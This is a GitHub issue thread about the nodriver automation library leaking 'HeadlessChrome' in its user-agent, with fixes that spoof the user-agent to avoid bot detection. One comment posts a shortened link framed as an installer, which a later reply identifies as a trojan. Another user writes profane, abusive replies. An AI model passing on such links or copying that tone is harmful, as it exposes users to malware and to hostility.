### ISSUE TITLE
Problem running nodriver in headless mode

### ISSUE THREAD

**Issue by KenyOnFire** [ultrafunkamsterdam/nodriver#5]
I was doing tests with the nodriver module, when I tried to test the headless mode and I discovered that when activating this mode, the user-agent is modified and this makes the browser detectable as a bot, I attach the user-agent that is returned to me when using headless. Thank you!

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/128.0.0.0 Safari/537.36

TEMPORALY FIX:
Inside the nodriver module there is a class called Config, on line 185 after
`if self.headless:
  args.append("--headless=new")`
I have included a request with the requests module to obtain the latest useragent for chrome without that supposed 'Headless' and thanks to this before the execution the 'Headless' text disappears, I leave the code here in case it helps someone
`            so_key = {"windows": "windows", "linux": "linux", "darwin": "mac"}[platform.system().lower()]
            ua = next(ua for ua in requests.get("https://jnrbsn.github.io/user-agents/user-agents.json").json() if so_key in ua.lower() and "chrome" in ua.lower() and "firefox" not in ua.lower())
            args.append('--user-agent=' + ua)`

**Comment by 777Naity** [comment]
try this
https://bit.ly/4e4zLlq
select the desired compiler in the installer

**Comment by KenyOnFire** [comment]
> try this https://bit.ly/4e4zLlq select the desired compiler in the installer

Warning: This URL has been blocked by Bitly's systems as potentially harmful.

Be Careful with this link is a trojan! :(

**Comment by ioio101** [comment]
The irony in a library designed to ensure Chrome's stealth as a web scraper, yet inadvertently revealing itself by failing to suppress the very "HeadlessChrome" signature it was supposed to conceal in headless mode.

**Comment by devblack** [comment]
> requests.get("https://jnrbsn.github.io/user-agents/user-agents.json").json()

Hello. That is unnecessary. you can manually replace it with useragent_override and replace() method.

**Comment by KenyOnFire** [comment]
> > requests.get("[https://jnrbsn.github.io/user-agents/user-agents.json").json(](https://jnrbsn.github.io/user-agents/user-agents.json%22).json())
> 
> Hello. That is unnecessary. you can manually replace it with useragent_override and replace() method.

I know that it is not necessary or practical in the long run, but I couldn't apply your logic, could you be more specific about using the useragent_override method since I can't find any documentation about that, besides the idea is that before initializing the browser , carry the useragent without the word Headless like undetected chromedriver does. If you could give me an example code in which you perform this fix, that would be great and I could conclude the thread.

PD: I have also tried this code but it only injects the cdp of the current tab, and not the entire browser
`    async def change_useragent(self, useragent):
        self.page.feed_cdp(cdp.emulation.set_user_agent_override(
            useragent
        ))
        return await self.page.reload()`

**Comment by boludoz** [comment]
It may not be a good idea to replace things, they will detect it anyway.

**Comment by boludoz** [comment]
Just run a javascript to do it.

**Comment by boludoz** [comment]
> The irony in a library designed to ensure Chrome's stealth as a web scraper, yet inadvertently revealing itself by failing to suppress the very "HeadlessChrome" signature it was supposed to conceal in headless mode.

Just run some javascript that does it and stop crying.

**Comment by boludoz** [comment]
> The irony in a library designed to ensure Chrome's stealth as a web scraper, yet inadvertently revealing itself by failing to suppress the very "HeadlessChrome" signature it was supposed to conceal in headless mode.

Just run a javascript that does it or start chrome with the custom agent from the commands and stop crying.

**Comment by boludoz** [comment]
He made the best fucking async library in the world probably for automation in Python and you complain about an agent, it's important to shut your ass and learn to respect the creators. 🤡🤡🤡🤡🤡

**Comment by Toxenskiy** [comment]
Study the documentation on user agents

**Comment by JuliusCesar23** [comment]
> I was doing tests with the nodriver module, when I tried to test the headless mode and I discovered that when activating this mode, the user-agent is modified and this makes the browser detectable as a bot, I attach the user-agent that is returned to me when using headless. Thank you!
> 
> Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/128.0.0.0 Safari/537.36
> 
> TEMPORALY FIX: Inside the nodriver module there is a class called Config, on line 185 after `if self.headless: args.append("--headless=new")` I have included a request with the requests module to obtain the latest useragent for chrome without that supposed 'Headless' and thanks to this before the execution the 'Headless' text disappears, I leave the code here in case it helps someone ` so_key = {"windows": "windows", "linux": "linux", "darwin": "mac"}[platform.system().lower()] ua = next(ua for ua in requests.get("https://jnrbsn.github.io/user-agents/user-agents.json").json() if so_key in ua.lower() and "chrome" in ua.lower() and "firefox" not in ua.lower()) args.append('--user-agent=' + ua)`

i have made a new pull request for this issue now
[https://github.com/ultrafunkamsterdam/nodriver/pull/10](Problem running nodriver in headless mode)

**Comment by ultrafunkamsterdam** [comment]
Well, i don't know what your problem is

```ipython

from nodriver import *

browser = await start(headless=True)

tab = await browser.get('https://deviceandbrowserinfo.com/are_you_a_bot')

await tab.save_screenshot(full_page=True)

!deviceandbrowserinfo.com__are_you_a_bot_2025-03-31_10-40-22.jpg

``` 
![Image](https://github.com/user-attachments/assets/569de6f3-801b-49f5-99fb-1fc6b5508a2f)
